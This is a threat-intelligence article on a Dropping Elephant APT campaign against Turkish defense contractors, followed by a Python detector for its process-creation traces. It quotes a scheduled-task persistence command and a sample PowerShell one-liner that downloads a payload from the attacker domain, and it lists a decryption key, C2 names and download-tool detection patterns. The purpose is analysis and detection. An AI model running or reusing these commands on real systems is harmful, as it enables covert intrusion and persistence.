The Dropping Elephant advanced persistent threat (APT) group has launched a sophisticated cyber-espionage campaign targeting Turkish defense contractors, particularly companies manufacturing precision-guided missile systems.
This operation represents a significant evolution in the group's capabilities, employing a complex five-stage execution chain that disguises malicious payloads as legitimate conference invitations related to unmanned vehicle systems.
The attack begins with a weaponized LNK file named "Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk" that masquerades as an invitation to a UAV conference scheduled for July 2025 in Istanbul.
Upon execution, the file initiates a PowerShell-based download sequence that retrieves several components from the malicious domain expouav[.]org, which impersonates the legitimate conference website waset.org.
Figure: legitimate waset.org website showing the same conference information reused by the fake PDF-based replica (Source: Arctic Wolf)
Arctic Wolf researchers identified this campaign as part of Dropping Elephant's expanded targeting scope, noting the group's strategic shift from traditional South Asian targets to NATO-allied defense industries.
The timing coincides with heightened Turkey-Pakistan defense cooperation and regional military tensions, suggesting geopolitically motivated intelligence-gathering objectives.
The malware demonstrates sophisticated evasion techniques by abusing legitimate software components, specifically VLC Media Player and the Microsoft Task Scheduler, through DLL side-loading.
This approach allows the threat actors to blend malicious activity with trusted processes, significantly reducing the likelihood of detection by security solutions.
Advanced Persistence and Command Execution Framework
The campaign's most notable innovation lies in its execution chain, which downloads five distinct files with deliberately obfuscated extensions.
The PowerShell execution uses stealth parameters, including -ep 1 to override the execution policy and $ProgressPreference="SilentlyContinue" to suppress visual progress indicators during the download process.
The attack chain begins by downloading a legitimate VLC Media Player executable (originally named "lama") alongside a malicious libvlc.dll library (originally "lake").
This DLL serves as a shellcode loader responsible for decrypting and executing the final payload stored in vlc.log. The decryption routine uses the hardcoded key "76bhu93FGRjZX5hj876bhu93FGRjX5" to transform the encrypted shellcode into a functional x86 PE executable.
Persistence is established through a scheduled task created via the following PowerShell command (saps is the built-in alias for Start-Process):
saps "C:\Windows\Tasks\Winver" -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "C:\Windows\Tasks\vlc", '/f';
This task executes the compromised VLC player every minute, ensuring continuous access to the system while maintaining the appearance of legitimate media player activity.
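The behaviours described above (a PowerShell download with the execution policy overridden and progress output silenced, a minute-interval scheduled task whose action lives in C:\Windows\Tasks, and a VLC-named binary staged in that same directory) are all visible in process-creation telemetry. The following detector is an added example written for this article, not code from Arctic Wolf or from the article itself. It assumes a simple, constructed pipe-delimited event format ("parent | image path | command line"); the sample events are constructed to mirror the reported techniques and are not real telemetry.

```python
import re
from typing import List, Tuple

Finding = Tuple[int, str]  # (event index, rule name)

# Directory the campaign abuses for staging the task runner and the VLC binary.
TASKS_DIR = r"C:\Windows\Tasks"

# Constructed sample process-creation events, one per line:
# "parent image | image path | command line". Not real telemetry.
SAMPLE_EVENTS = """\
explorer.exe | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell.exe -ep 1 -w hidden -c "$ProgressPreference='SilentlyContinue'; iwr https://expouav[.]org/lama -OutFile C:\\Windows\\Tasks\\vlc"
powershell.exe | C:\\Windows\\Tasks\\Winver | C:\\Windows\\Tasks\\Winver /Create /sc minute /tn NewErrorReport /tr C:\\Windows\\Tasks\\vlc /f
svchost.exe | C:\\Windows\\Tasks\\vlc | C:\\Windows\\Tasks\\vlc
explorer.exe | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell.exe -NoProfile -c "Get-Date"
explorer.exe | C:\\Program Files\\VideoLAN\\VLC\\vlc.exe | "C:\\Program Files\\VideoLAN\\VLC\\vlc.exe" movie.mp4
"""

# Execution-policy override in any of its spellings (-ep, -ex, -exec, -ExecutionPolicy).
EP_RE = re.compile(r"(?:^|\s)-(?:ep|ex|exec|executionpolicy)\s+\S+", re.I)
# $ProgressPreference set to SilentlyContinue, quoted or not.
SILENT_RE = re.compile(r"progresspreference\s*=\s*['\"]?silentlycontinue", re.I)
# Common download primitives used from a PowerShell one-liner.
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl|wget)\b", re.I)
# schtasks-style creation of a task that fires every minute; captures the /tr action path.
TASK_CREATE_RE = re.compile(r"/create\b.*?/sc\s+minute\b.*?/tr\s+(\"[^\"]+\"|\S+)", re.I | re.S)


def under(path: str, parent: str) -> bool:
    """True if a Windows path lies inside `parent` (case-insensitive, surrounding quotes stripped)."""
    norm = path.strip('"').lower()
    return norm.startswith(parent.lower().rstrip("\\") + "\\")


def analyze(events_text: str) -> List[Finding]:
    """Run the three rules over pipe-delimited process-creation events and return the hits."""
    findings: List[Finding] = []
    lines = [l for l in events_text.splitlines() if l.strip()]
    for idx, line in enumerate(lines):
        parent, image, cmdline = (f.strip() for f in line.split(" | ", 2))
        image_name = image.strip('"').rsplit("\\", 1)[-1].lower()

        # Rule 1: PowerShell with an execution-policy override, the progress bar silenced,
        # and a download primitive in the same command line.
        if (image_name == "powershell.exe" and EP_RE.search(cmdline)
                and SILENT_RE.search(cmdline) and DOWNLOAD_RE.search(cmdline)):
            findings.append((idx, "powershell_silent_download"))

        # Rule 2: a task that fires every minute and whose action lives in C:\Windows\Tasks.
        # If the image is not schtasks.exe itself, the task runner was renamed/copied.
        m = TASK_CREATE_RE.search(cmdline)
        if m and under(m.group(1), TASKS_DIR):
            findings.append((idx, "minute_task_from_tasks_dir"))
            if image_name != "schtasks.exe":
                findings.append((idx, "schtasks_renamed_binary"))

        # Rule 3: a VLC-named binary executing from the Tasks directory, which is where a
        # side-loaded libvlc.dll would sit next to it rather than in the VLC install folder.
        if image_name.startswith("vlc") and under(image, TASKS_DIR):
            findings.append((idx, "vlc_from_tasks_dir"))
    return findings


if __name__ == "__main__":
    for event_index, rule in analyze(SAMPLE_EVENTS):
        print(f"event {event_index}: {rule}")
```

The benign events (a plain Get-Date invocation and VLC started from its normal install path) produce no findings, which is the point of requiring several indicators together in rule 1 and anchoring rules 2 and 3 on the staging directory rather than on the VLC name alone. In production the same logic maps directly onto process-creation events from Sysmon or an EDR, with the `/tr` path check extended to any user-writable location.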
The final payload communicates with the command-and-control server roseserve[.]org, which impersonates the website of Turkey's Pardus Linux distribution.
The malware creates a mutex named "ghjghkj" to prevent multiple instances and implements seven distinct command handlers, including screenshot capture (3SC3), file upload (3ngjfng5), and remote code execution (3gjdfghj6), giving the attackers comprehensive control over the compromised system.